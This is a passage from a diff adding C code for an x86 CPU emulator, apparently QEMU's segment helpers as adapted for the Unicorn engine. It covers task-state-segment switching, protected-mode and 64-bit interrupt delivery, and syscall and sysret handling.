DESC_P_MASK | DESC_S_MASK | DESC_W_MASK | + DESC_A_MASK | (3 << DESC_DPL_SHIFT)); +} + +static inline void get_ss_esp_from_tss(CPUX86State *env, uint32_t *ss_ptr, + uint32_t *esp_ptr, int dpl) +{ + X86CPU *cpu = x86_env_get_cpu(env); + int type, index, shift; + +#if 0 + { + int i; + printf("TR: base=%p limit=%x\n", env->tr.base, env->tr.limit); + for (i = 0; i < env->tr.limit; i++) { + printf("%02x ", env->tr.base[i]); + if ((i & 7) == 7) { + printf("\n"); + } + } + printf("\n"); + } +#endif + + if (!(env->tr.flags & DESC_P_MASK)) { + cpu_abort(CPU(cpu), "invalid tss"); + } + type = (env->tr.flags >> DESC_TYPE_SHIFT) & 0xf; + if ((type & 7) != 1) { + cpu_abort(CPU(cpu), "invalid tss type"); + } + shift = type >> 3; + index = (dpl * 4 + 2) << shift; + if (index + (4 << shift) - 1 > env->tr.limit) { + raise_exception_err(env, EXCP0A_TSS, env->tr.selector & 0xfffc); + } + if (shift == 0) { + *esp_ptr = cpu_lduw_kernel(env, env->tr.base + index); + *ss_ptr = cpu_lduw_kernel(env, env->tr.base + index + 2); + } else { + *esp_ptr = cpu_ldl_kernel(env, env->tr.base + index); + *ss_ptr = cpu_lduw_kernel(env, env->tr.base + index + 4); + } +} + +static void tss_load_seg(CPUX86State *env, int seg_reg, int selector, int cpl) +{ + uint32_t e1, e2; + int rpl, dpl; + + if ((selector & 0xfffc) != 0) { + if (load_segment(env, &e1, &e2, selector) != 0) { + raise_exception_err(env, EXCP0A_TSS, selector & 0xfffc); + } + if (!(e2 & DESC_S_MASK)) { + raise_exception_err(env, EXCP0A_TSS, selector & 0xfffc); + } + rpl = selector & 3; + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (seg_reg == R_CS) { + if (!(e2 & DESC_CS_MASK)) { + raise_exception_err(env, EXCP0A_TSS, selector & 0xfffc); + } + if (dpl != rpl) { + raise_exception_err(env, EXCP0A_TSS, selector & 0xfffc); + } + } else if (seg_reg == R_SS) { + /* SS must be writable data */ + if ((e2 & DESC_CS_MASK) || !(e2 & DESC_W_MASK)) { + raise_exception_err(env, EXCP0A_TSS, selector & 0xfffc); + } + if (dpl != cpl || dpl != rpl) { + raise_exception_err(env, EXCP0A_TSS, selector & 0xfffc); + } + } else { + /* not readable code */ + if ((e2 & DESC_CS_MASK) && !(e2 & DESC_R_MASK)) { + raise_exception_err(env, EXCP0A_TSS, selector & 0xfffc); + } + /* if data or non conforming code, checks the rights */ + if (((e2 >> DESC_TYPE_SHIFT) & 0xf) < 12) { + if (dpl < cpl || dpl < rpl) { + raise_exception_err(env, EXCP0A_TSS, selector & 0xfffc); + } + } + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, selector & 0xfffc); + } + cpu_x86_load_seg_cache(env, seg_reg, selector, + get_seg_base(e1, e2), + get_seg_limit(e1, e2), + e2); + } else { + if (seg_reg == R_SS || seg_reg == R_CS) { + raise_exception_err(env, EXCP0A_TSS, selector & 0xfffc); + } + } +} + +#define SWITCH_TSS_JMP 0 +#define SWITCH_TSS_IRET 1 +#define SWITCH_TSS_CALL 2 + +/* XXX: restore CPU state in registers (PowerPC case) */ +static void switch_tss(CPUX86State *env, int tss_selector, + uint32_t e1, uint32_t e2, int source, + uint32_t next_eip) +{ + int tss_limit, tss_limit_max, type, old_tss_limit_max, old_type, v1, v2, i; + target_ulong tss_base; + uint32_t new_regs[8], new_segs[6]; + uint32_t new_eflags, new_eip, new_cr3, new_ldt, new_trap; + uint32_t old_eflags, eflags_mask; + SegmentCache *dt; + int index; + target_ulong ptr; + + type = (e2 >> DESC_TYPE_SHIFT) & 0xf; + LOG_PCALL("switch_tss: sel=0x%04x type=%d src=%d\n", tss_selector, type, + source); + + /* if task gate, we read the TSS segment and we load it */ + if (type == 5) { + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, tss_selector & 0xfffc); + } + tss_selector = e1 >> 16; + if (tss_selector & 4) { + raise_exception_err(env, EXCP0A_TSS, tss_selector & 0xfffc); + } + if (load_segment(env, &e1, &e2, tss_selector) != 0) { + raise_exception_err(env, EXCP0D_GPF, tss_selector & 0xfffc); + } + if (e2 & DESC_S_MASK) { + raise_exception_err(env, EXCP0D_GPF, tss_selector & 0xfffc); + } + type = (e2 >> DESC_TYPE_SHIFT) & 0xf; + if ((type & 7) != 1) { + raise_exception_err(env, EXCP0D_GPF, tss_selector & 0xfffc); + } + } + + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, tss_selector & 0xfffc); + } + + if (type & 8) { + tss_limit_max = 103; + } else { + tss_limit_max = 43; + } + tss_limit = get_seg_limit(e1, e2); + tss_base = get_seg_base(e1, e2); + if ((tss_selector & 4) != 0 || + tss_limit < tss_limit_max) { + raise_exception_err(env, EXCP0A_TSS, tss_selector & 0xfffc); + } + old_type = (env->tr.flags >> DESC_TYPE_SHIFT) & 0xf; + if (old_type & 8) { + old_tss_limit_max = 103; + } else { + old_tss_limit_max = 43; + } + + /* read all the registers from the new TSS */ + if (type & 8) { + /* 32 bit */ + new_cr3 = cpu_ldl_kernel(env, tss_base + 0x1c); + new_eip = cpu_ldl_kernel(env, tss_base + 0x20); + new_eflags = cpu_ldl_kernel(env, tss_base + 0x24); + for (i = 0; i < 8; i++) { + new_regs[i] = cpu_ldl_kernel(env, tss_base + (0x28 + i * 4)); + } + for (i = 0; i < 6; i++) { + new_segs[i] = cpu_lduw_kernel(env, tss_base + (0x48 + i * 4)); + } + new_ldt = cpu_lduw_kernel(env, tss_base + 0x60); + new_trap = cpu_ldl_kernel(env, tss_base + 0x64); + } else { + /* 16 bit */ + new_cr3 = 0; + new_eip = cpu_lduw_kernel(env, tss_base + 0x0e); + new_eflags = cpu_lduw_kernel(env, tss_base + 0x10); + for (i = 0; i < 8; i++) { + new_regs[i] = cpu_lduw_kernel(env, tss_base + (0x12 + i * 2)) | + 0xffff0000; + } + for (i = 0; i < 4; i++) { + new_segs[i] = cpu_lduw_kernel(env, tss_base + (0x22 + i * 4)); + } + new_ldt = cpu_lduw_kernel(env, tss_base + 0x2a); + new_segs[R_FS] = 0; + new_segs[R_GS] = 0; + new_trap = 0; + } + /* XXX: avoid a compiler warning, see + http://support.amd.com/us/Processor_TechDocs/24593.pdf + chapters 12.2.5 and 13.2.4 on how to implement TSS Trap bit */ + (void)new_trap; + + /* NOTE: we must avoid memory exceptions during the task switch, + so we make dummy accesses before */ + /* XXX: it can still fail in some cases, so a bigger hack is + necessary to valid the TLB after having done the accesses */ + + v1 = cpu_ldub_kernel(env, env->tr.base); + v2 = cpu_ldub_kernel(env, env->tr.base + old_tss_limit_max); + cpu_stb_kernel(env, env->tr.base, v1); + cpu_stb_kernel(env, env->tr.base + old_tss_limit_max, v2); + + /* clear busy bit (it is restartable) */ + if (source == SWITCH_TSS_JMP || source == SWITCH_TSS_IRET) { + target_ulong ptr; + uint32_t e2; + + ptr = env->gdt.base + (env->tr.selector & ~7); + e2 = cpu_ldl_kernel(env, ptr + 4); + e2 &= ~DESC_TSS_BUSY_MASK; + cpu_stl_kernel(env, ptr + 4, e2); + } + old_eflags = cpu_compute_eflags(env); + if (source == SWITCH_TSS_IRET) { + old_eflags &= ~NT_MASK; + } + + /* save the current state in the old TSS */ + if (type & 8) { + /* 32 bit */ + cpu_stl_kernel(env, env->tr.base + 0x20, next_eip); + cpu_stl_kernel(env, env->tr.base + 0x24, old_eflags); + cpu_stl_kernel(env, env->tr.base + (0x28 + 0 * 4), env->regs[R_EAX]); + cpu_stl_kernel(env, env->tr.base + (0x28 + 1 * 4), env->regs[R_ECX]); + cpu_stl_kernel(env, env->tr.base + (0x28 + 2 * 4), env->regs[R_EDX]); + cpu_stl_kernel(env, env->tr.base + (0x28 + 3 * 4), env->regs[R_EBX]); + cpu_stl_kernel(env, env->tr.base + (0x28 + 4 * 4), env->regs[R_ESP]); + cpu_stl_kernel(env, env->tr.base + (0x28 + 5 * 4), env->regs[R_EBP]); + cpu_stl_kernel(env, env->tr.base + (0x28 + 6 * 4), env->regs[R_ESI]); + cpu_stl_kernel(env, env->tr.base + (0x28 + 7 * 4), env->regs[R_EDI]); + for (i = 0; i < 6; i++) { + cpu_stw_kernel(env, env->tr.base + (0x48 + i * 4), + env->segs[i].selector); + } + } else { + /* 16 bit */ + cpu_stw_kernel(env, env->tr.base + 0x0e, next_eip); + cpu_stw_kernel(env, env->tr.base + 0x10, old_eflags); + cpu_stw_kernel(env, env->tr.base + (0x12 + 0 * 2), env->regs[R_EAX]); + cpu_stw_kernel(env, env->tr.base + (0x12 + 1 * 2), env->regs[R_ECX]); + cpu_stw_kernel(env, env->tr.base + (0x12 + 2 * 2), env->regs[R_EDX]); + cpu_stw_kernel(env, env->tr.base + (0x12 + 3 * 2), env->regs[R_EBX]); + cpu_stw_kernel(env, env->tr.base + (0x12 + 4 * 2), env->regs[R_ESP]); + cpu_stw_kernel(env, env->tr.base + (0x12 + 5 * 2), env->regs[R_EBP]); + cpu_stw_kernel(env, env->tr.base + (0x12 + 6 * 2), env->regs[R_ESI]); + cpu_stw_kernel(env, env->tr.base + (0x12 + 7 * 2), env->regs[R_EDI]); + for (i = 0; i < 4; i++) { + cpu_stw_kernel(env, env->tr.base + (0x22 + i * 4), + env->segs[i].selector); + } + } + + /* now if an exception occurs, it will occurs in the next task + context */ + + if (source == SWITCH_TSS_CALL) { + cpu_stw_kernel(env, tss_base, env->tr.selector); + new_eflags |= NT_MASK; + } + + /* set busy bit */ + if (source == SWITCH_TSS_JMP || source == SWITCH_TSS_CALL) { + target_ulong ptr; + uint32_t e2; + + ptr = env->gdt.base + (tss_selector & ~7); + e2 = cpu_ldl_kernel(env, ptr + 4); + e2 |= DESC_TSS_BUSY_MASK; + cpu_stl_kernel(env, ptr + 4, e2); + } + + /* set the new CPU state */ + /* from this point, any exception which occurs can give problems */ + env->cr[0] |= CR0_TS_MASK; + env->hflags |= HF_TS_MASK; + env->tr.selector = tss_selector; + env->tr.base = tss_base; + env->tr.limit = tss_limit; + env->tr.flags = e2 & ~DESC_TSS_BUSY_MASK; + + if ((type & 8) && (env->cr[0] & CR0_PG_MASK)) { + cpu_x86_update_cr3(env, new_cr3); + } + + /* load all registers without an exception, then reload them with + possible exception */ + env->eip = new_eip; + eflags_mask = TF_MASK | AC_MASK | ID_MASK | + IF_MASK | IOPL_MASK | VM_MASK | RF_MASK | NT_MASK; + if (!(type & 8)) { + eflags_mask &= 0xffff; + } + cpu_load_eflags(env, new_eflags, eflags_mask); + /* XXX: what to do in 16 bit case? */ + env->regs[R_EAX] = new_regs[0]; + env->regs[R_ECX] = new_regs[1]; + env->regs[R_EDX] = new_regs[2]; + env->regs[R_EBX] = new_regs[3]; + env->regs[R_ESP] = new_regs[4]; + env->regs[R_EBP] = new_regs[5]; + env->regs[R_ESI] = new_regs[6]; + env->regs[R_EDI] = new_regs[7]; + if (new_eflags & VM_MASK) { + for (i = 0; i < 6; i++) { + load_seg_vm(env, i, new_segs[i]); + } + } else { + /* first just selectors as the rest may trigger exceptions */ + for (i = 0; i < 6; i++) { + cpu_x86_load_seg_cache(env, i, new_segs[i], 0, 0, 0); + } + } + + env->ldt.selector = new_ldt & ~4; + env->ldt.base = 0; + env->ldt.limit = 0; + env->ldt.flags = 0; + + /* load the LDT */ + if (new_ldt & 4) { + raise_exception_err(env, EXCP0A_TSS, new_ldt & 0xfffc); + } + + if ((new_ldt & 0xfffc) != 0) { + dt = &env->gdt; + index = new_ldt & ~7; + if ((index + 7) > dt->limit) { + raise_exception_err(env, EXCP0A_TSS, new_ldt & 0xfffc); + } + ptr = dt->base + index; + e1 = cpu_ldl_kernel(env, ptr); + e2 = cpu_ldl_kernel(env, ptr + 4); + if ((e2 & DESC_S_MASK) || ((e2 >> DESC_TYPE_SHIFT) & 0xf) != 2) { + raise_exception_err(env, EXCP0A_TSS, new_ldt & 0xfffc); + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0A_TSS, new_ldt & 0xfffc); + } + load_seg_cache_raw_dt(&env->ldt, e1, e2); + } + + /* load the segments */ + if (!(new_eflags & VM_MASK)) { + int cpl = new_segs[R_CS] & 3; + tss_load_seg(env, R_CS, new_segs[R_CS], cpl); + tss_load_seg(env, R_SS, new_segs[R_SS], cpl); + tss_load_seg(env, R_ES, new_segs[R_ES], cpl); + tss_load_seg(env, R_DS, new_segs[R_DS], cpl); + tss_load_seg(env, R_FS, new_segs[R_FS], cpl); + tss_load_seg(env, R_GS, new_segs[R_GS], cpl); + } + + /* check that env->eip is in the CS segment limits */ + if (new_eip > env->segs[R_CS].limit) { + /* XXX: different exception if CALL? */ + raise_exception_err(env, EXCP0D_GPF, 0); + } + +#ifndef CONFIG_USER_ONLY + /* reset local breakpoints */ + if (env->dr[7] & DR7_LOCAL_BP_MASK) { + for (i = 0; i < DR7_MAX_BP; i++) { + if (hw_local_breakpoint_enabled(env->dr[7], i) && + !hw_global_breakpoint_enabled(env->dr[7], i)) { + hw_breakpoint_remove(env, i); + } + } + env->dr[7] &= ~DR7_LOCAL_BP_MASK; + } +#endif +} + +static inline unsigned int get_sp_mask(unsigned int e2) +{ + if (e2 & DESC_B_MASK) { + return 0xffffffff; + } else { + return 0xffff; + } +} + +static int exception_has_error_code(int intno) +{ + switch (intno) { + case 8: + case 10: + case 11: + case 12: + case 13: + case 14: + case 17: + return 1; + } + return 0; +} + +#ifdef TARGET_X86_64 +#define SET_ESP(val, sp_mask) \ + do { \ + if ((sp_mask) == 0xffff) { \ + env->regs[R_ESP] = (env->regs[R_ESP] & ~0xffff) | \ + ((val) & 0xffff); \ + } else if ((sp_mask) == 0xffffffffLL) { \ + env->regs[R_ESP] = (uint32_t)(val); \ + } else { \ + env->regs[R_ESP] = (val); \ + } \ + } while (0) +#else +#define SET_ESP(val, sp_mask) \ + do { \ + env->regs[R_ESP] = (env->regs[R_ESP] & ~(sp_mask)) | \ + ((val) & (sp_mask)); \ + } while (0) +#endif + +/* in 64-bit machines, this can overflow. So this segment addition macro + * can be used to trim the value to 32-bit whenever needed */ +#define SEG_ADDL(ssp, sp, sp_mask) ((uint32_t)((ssp) + (sp & (sp_mask)))) + +/* XXX: add a is_user flag to have proper security support */ +#define PUSHW(ssp, sp, sp_mask, val) \ + { \ + sp -= 2; \ + cpu_stw_kernel(env, (ssp) + (sp & (sp_mask)), (val)); \ + } + +#define PUSHL(ssp, sp, sp_mask, val) \ + { \ + sp -= 4; \ + cpu_stl_kernel(env, SEG_ADDL(ssp, sp, sp_mask), (uint32_t)(val)); \ + } + +#define POPW(ssp, sp, sp_mask, val) \ + { \ + val = cpu_lduw_kernel(env, (ssp) + (sp & (sp_mask))); \ + sp += 2; \ + } + +#define POPL(ssp, sp, sp_mask, val) \ + { \ + val = (uint32_t)cpu_ldl_kernel(env, SEG_ADDL(ssp, sp, sp_mask)); \ + sp += 4; \ + } + +/* protected mode interrupt */ +static void do_interrupt_protected(CPUX86State *env, int intno, int is_int, + int error_code, unsigned int next_eip, + int is_hw) // qq +{ + SegmentCache *dt; + target_ulong ptr, ssp; + int type, dpl, selector, ss_dpl, cpl; + int has_error_code, new_stack, shift; + uint32_t e1, e2, offset, ss = 0, esp, ss_e1 = 0, ss_e2 = 0; + uint32_t old_eip, sp_mask; + int vm86 = env->eflags & VM_MASK; + + has_error_code = 0; + if (!is_int && !is_hw) { + has_error_code = exception_has_error_code(intno); + } + if (is_int) { + old_eip = next_eip; + } else { + old_eip = env->eip; + } + + dt = &env->idt; + if (intno * 8 + 7 > dt->limit) { + raise_exception_err(env, EXCP0D_GPF, intno * 8 + 2); + } + ptr = dt->base + intno * 8; + e1 = cpu_ldl_kernel(env, ptr); + e2 = cpu_ldl_kernel(env, ptr + 4); + /* check gate type */ + type = (e2 >> DESC_TYPE_SHIFT) & 0x1f; + switch (type) { + case 5: /* task gate */ + /* must do that check here to return the correct error code */ + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, intno * 8 + 2); + } + switch_tss(env, intno * 8, e1, e2, SWITCH_TSS_CALL, old_eip); + if (has_error_code) { + int type; + uint32_t mask; + + /* push the error code */ + type = (env->tr.flags >> DESC_TYPE_SHIFT) & 0xf; + shift = type >> 3; + if (env->segs[R_SS].flags & DESC_B_MASK) { + mask = 0xffffffff; + } else { + mask = 0xffff; + } + esp = (env->regs[R_ESP] - (2 << shift)) & mask; + ssp = env->segs[R_SS].base + esp; + if (shift) { + cpu_stl_kernel(env, ssp, error_code); + } else { + cpu_stw_kernel(env, ssp, error_code); + } + SET_ESP(esp, mask); + } + return; + case 6: /* 286 interrupt gate */ + case 7: /* 286 trap gate */ + case 14: /* 386 interrupt gate */ + case 15: /* 386 trap gate */ + break; + default: + raise_exception_err(env, EXCP0D_GPF, intno * 8 + 2); + break; + } + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + cpl = env->hflags & HF_CPL_MASK; + /* check privilege if software int */ + if (is_int && dpl < cpl) { + raise_exception_err(env, EXCP0D_GPF, intno * 8 + 2); + } + /* check valid bit */ + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, intno * 8 + 2); + } + selector = e1 >> 16; + offset = (e2 & 0xffff0000) | (e1 & 0x0000ffff); + if ((selector & 0xfffc) == 0) { + raise_exception_err(env, EXCP0D_GPF, 0); + } + if (load_segment(env, &e1, &e2, selector) != 0) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if (!(e2 & DESC_S_MASK) || !(e2 & (DESC_CS_MASK))) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (dpl > cpl) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, selector & 0xfffc); + } + if (!(e2 & DESC_C_MASK) && dpl < cpl) { + /* to inner privilege */ + get_ss_esp_from_tss(env, &ss, &esp, dpl); + if ((ss & 0xfffc) == 0) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + if ((ss & 3) != dpl) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + if (load_segment(env, &ss_e1, &ss_e2, ss) != 0) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + ss_dpl = (ss_e2 >> DESC_DPL_SHIFT) & 3; + if (ss_dpl != dpl) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + if (!(ss_e2 & DESC_S_MASK) || + (ss_e2 & DESC_CS_MASK) || + !(ss_e2 & DESC_W_MASK)) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + if (!(ss_e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0A_TSS, ss & 0xfffc); + } + new_stack = 1; + sp_mask = get_sp_mask(ss_e2); + ssp = get_seg_base(ss_e1, ss_e2); + } else if ((e2 & DESC_C_MASK) || dpl == cpl) { + /* to same privilege */ + if (vm86) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + new_stack = 0; + sp_mask = get_sp_mask(env->segs[R_SS].flags); + ssp = env->segs[R_SS].base; + esp = env->regs[R_ESP]; + dpl = cpl; + } else { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + new_stack = 0; /* avoid warning */ + sp_mask = 0; /* avoid warning */ + ssp = 0; /* avoid warning */ + esp = 0; /* avoid warning */ + } + + shift = type >> 3; + +#if 0 + /* XXX: check that enough room is available */ + push_size = 6 + (new_stack << 2) + (has_error_code << 1); + if (vm86) { + push_size += 8; + } + push_size <<= shift; +#endif + if (shift == 1) { + if (new_stack) { + if (vm86) { + PUSHL(ssp, esp, sp_mask, env->segs[R_GS].selector); + PUSHL(ssp, esp, sp_mask, env->segs[R_FS].selector); + PUSHL(ssp, esp, sp_mask, env->segs[R_DS].selector); + PUSHL(ssp, esp, sp_mask, env->segs[R_ES].selector); + } + PUSHL(ssp, esp, sp_mask, env->segs[R_SS].selector); + PUSHL(ssp, esp, sp_mask, env->regs[R_ESP]); + } + PUSHL(ssp, esp, sp_mask, cpu_compute_eflags(env)); + PUSHL(ssp, esp, sp_mask, env->segs[R_CS].selector); + PUSHL(ssp, esp, sp_mask, old_eip); + if (has_error_code) { + PUSHL(ssp, esp, sp_mask, error_code); + } + } else { + if (new_stack) { + if (vm86) { + PUSHW(ssp, esp, sp_mask, env->segs[R_GS].selector); + PUSHW(ssp, esp, sp_mask, env->segs[R_FS].selector); + PUSHW(ssp, esp, sp_mask, env->segs[R_DS].selector); + PUSHW(ssp, esp, sp_mask, env->segs[R_ES].selector); + } + PUSHW(ssp, esp, sp_mask, env->segs[R_SS].selector); + PUSHW(ssp, esp, sp_mask, env->regs[R_ESP]); + } + PUSHW(ssp, esp, sp_mask, cpu_compute_eflags(env)); + PUSHW(ssp, esp, sp_mask, env->segs[R_CS].selector); + PUSHW(ssp, esp, sp_mask, old_eip); + if (has_error_code) { + PUSHW(ssp, esp, sp_mask, error_code); + } + } + + /* interrupt gate clear IF mask */ + if ((type & 1) == 0) { + env->eflags &= ~IF_MASK; + } + env->eflags &= ~(TF_MASK | VM_MASK | RF_MASK | NT_MASK); + + if (new_stack) { + if (vm86) { + cpu_x86_load_seg_cache(env, R_ES, 0, 0, 0, 0); + cpu_x86_load_seg_cache(env, R_DS, 0, 0, 0, 0); + cpu_x86_load_seg_cache(env, R_FS, 0, 0, 0, 0); + cpu_x86_load_seg_cache(env, R_GS, 0, 0, 0, 0); + } + ss = (ss & ~3) | dpl; + cpu_x86_load_seg_cache(env, R_SS, ss, + ssp, get_seg_limit(ss_e1, ss_e2), ss_e2); + } + SET_ESP(esp, sp_mask); + + selector = (selector & ~3) | dpl; + cpu_x86_load_seg_cache(env, R_CS, selector, + get_seg_base(e1, e2), + get_seg_limit(e1, e2), + e2); + env->eip = offset; +} + +#ifdef TARGET_X86_64 + +#define PUSHQ(sp, val) \ + { \ + sp -= 8; \ + cpu_stq_kernel(env, sp, (val)); \ + } + +#define POPQ(sp, val) \ + { \ + val = cpu_ldq_kernel(env, sp); \ + sp += 8; \ + } + +static inline target_ulong get_rsp_from_tss(CPUX86State *env, int level) +{ + X86CPU *cpu = x86_env_get_cpu(env); + int index; + +#if 0 + printf("TR: base=" TARGET_FMT_lx " limit=%x\n", + env->tr.base, env->tr.limit); +#endif + + if (!(env->tr.flags & DESC_P_MASK)) { + cpu_abort(CPU(cpu), "invalid tss"); + } + index = 8 * level + 4; + if ((index + 7) > env->tr.limit) { + raise_exception_err(env, EXCP0A_TSS, env->tr.selector & 0xfffc); + } + return cpu_ldq_kernel(env, env->tr.base + index); +} + +/* 64 bit interrupt */ +static void do_interrupt64(CPUX86State *env, int intno, int is_int, + int error_code, target_ulong next_eip, int is_hw) // qq +{ + SegmentCache *dt; + target_ulong ptr; + int type, dpl, selector, cpl, ist; + int has_error_code, new_stack; + uint32_t e1, e2, e3, ss; + target_ulong old_eip, esp, offset; + + has_error_code = 0; + if (!is_int && !is_hw) { + has_error_code = exception_has_error_code(intno); + } + if (is_int) { + old_eip = next_eip; + } else { + old_eip = env->eip; + } + + dt = &env->idt; + if (intno * 16 + 15 > dt->limit) { + raise_exception_err(env, EXCP0D_GPF, intno * 16 + 2); + } + ptr = dt->base + intno * 16; + e1 = cpu_ldl_kernel(env, ptr); + e2 = cpu_ldl_kernel(env, ptr + 4); + e3 = cpu_ldl_kernel(env, ptr + 8); + /* check gate type */ + type = (e2 >> DESC_TYPE_SHIFT) & 0x1f; + switch (type) { + case 14: /* 386 interrupt gate */ + case 15: /* 386 trap gate */ + break; + default: + raise_exception_err(env, EXCP0D_GPF, intno * 16 + 2); + break; + } + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + cpl = env->hflags & HF_CPL_MASK; + /* check privilege if software int */ + if (is_int && dpl < cpl) { + raise_exception_err(env, EXCP0D_GPF, intno * 16 + 2); + } + /* check valid bit */ + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, intno * 16 + 2); + } + selector = e1 >> 16; + offset = ((target_ulong)e3 << 32) | (e2 & 0xffff0000) | (e1 & 0x0000ffff); + ist = e2 & 7; + if ((selector & 0xfffc) == 0) { + raise_exception_err(env, EXCP0D_GPF, 0); + } + + if (load_segment(env, &e1, &e2, selector) != 0) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if (!(e2 & DESC_S_MASK) || !(e2 & (DESC_CS_MASK))) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (dpl > cpl) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, selector & 0xfffc); + } + if (!(e2 & DESC_L_MASK) || (e2 & DESC_B_MASK)) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if ((!(e2 & DESC_C_MASK) && dpl < cpl) || ist != 0) { + /* to inner privilege */ + new_stack = 1; + esp = get_rsp_from_tss(env, ist != 0 ? ist + 3 : dpl); + ss = 0; + } else if ((e2 & DESC_C_MASK) || dpl == cpl) { + /* to same privilege */ + if (env->eflags & VM_MASK) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + new_stack = 0; + esp = env->regs[R_ESP]; + dpl = cpl; + } else { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + new_stack = 0; /* avoid warning */ + esp = 0; /* avoid warning */ + } + esp &= ~0xfLL; /* align stack */ + + PUSHQ(esp, env->segs[R_SS].selector); + PUSHQ(esp, env->regs[R_ESP]); + PUSHQ(esp, cpu_compute_eflags(env)); + PUSHQ(esp, env->segs[R_CS].selector); + PUSHQ(esp, old_eip); + if (has_error_code) { + PUSHQ(esp, error_code); + } + + /* interrupt gate clear IF mask */ + if ((type & 1) == 0) { + env->eflags &= ~IF_MASK; + } + env->eflags &= ~(TF_MASK | VM_MASK | RF_MASK | NT_MASK); + + if (new_stack) { + ss = 0 | dpl; + cpu_x86_load_seg_cache(env, R_SS, ss, 0, 0, 0); + } + env->regs[R_ESP] = esp; + + selector = (selector & ~3) | dpl; + cpu_x86_load_seg_cache(env, R_CS, selector, + get_seg_base(e1, e2), + get_seg_limit(e1, e2), + e2); + env->eip = offset; +} +#endif + +#ifdef TARGET_X86_64 +#if defined(CONFIG_USER_ONLY) +void helper_syscall(CPUX86State *env, int next_eip_addend) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + + cs->exception_index = EXCP_SYSCALL; + env->exception_next_eip = env->eip + next_eip_addend; + cpu_loop_exit(cs); +} +#else +void helper_syscall(CPUX86State *env, int next_eip_addend) +{ + // Unicorn: call registered syscall hooks + struct hook *hook; + HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(env->uc, hook, UC_HOOK_INSN) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, env->eip)) + continue; + if (hook->insn == UC_X86_INS_SYSCALL) + ((uc_cb_insn_syscall_t)hook->callback)(env->uc, hook->user_data); + } + + env->eip += next_eip_addend; + return; +/* + int selector; + + if (!(env->efer & MSR_EFER_SCE)) { + raise_exception_err(env, EXCP06_ILLOP, 0); + } + selector = (env->star >> 32) & 0xffff; + if (env->hflags & HF_LMA_MASK) { + int code64; + + env->regs[R_ECX] = env->eip + next_eip_addend; + env->regs[11] = cpu_compute_eflags(env); + + code64 = env->hflags & HF_CS64_MASK; + + env->eflags &= ~env->fmask; + cpu_load_eflags(env, env->eflags, 0); + cpu_x86_load_seg_cache(env, R_CS, selector & 0xfffc, + 0, 0xffffffff, + DESC_G_MASK | DESC_P_MASK | + DESC_S_MASK | + DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK | + DESC_L_MASK); + cpu_x86_load_seg_cache(env, R_SS, (selector + 8) & 0xfffc, + 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | + DESC_W_MASK | DESC_A_MASK); + if (code64) { + env->eip = env->lstar; + } else { + env->eip = env->cstar; + } + } else { + env->regs[R_ECX] = (uint32_t)(env->eip + next_eip_addend); + + env->eflags &= ~(IF_MASK | RF_MASK | VM_MASK); + cpu_x86_load_seg_cache(env, R_CS, selector & 0xfffc, + 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | + DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_SS, (selector + 8) & 0xfffc, + 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | + DESC_W_MASK | DESC_A_MASK); + env->eip = (uint32_t)env->star; + } +*/ +} +#endif +#endif + +#ifdef TARGET_X86_64 +void helper_sysret(CPUX86State *env, int dflag) +{ + int cpl, selector; + + if (!(env->efer & MSR_EFER_SCE)) { + raise_exception_err(env, EXCP06_ILLOP, 0); + } + cpl = env->hflags & HF_CPL_MASK; + if (!(env->cr[0] & CR0_PE_MASK) || cpl != 0) { + raise_exception_err(env, EXCP0D_GPF, 0); + } + selector = (env->star >> 48) & 0xffff; + if (env->hflags & HF_LMA_MASK) { + cpu_load_eflags(env, (uint32_t)(env->regs[11]), TF_MASK | AC_MASK + | ID_MASK | IF_MASK | IOPL_MASK | VM_MASK | RF_MASK | + NT_MASK); + if (dflag == 2) { + cpu_x86_load_seg_cache(env, R_CS, (selector + 16) | 3, + 0, 0xffffffff, + DESC_G_MASK | 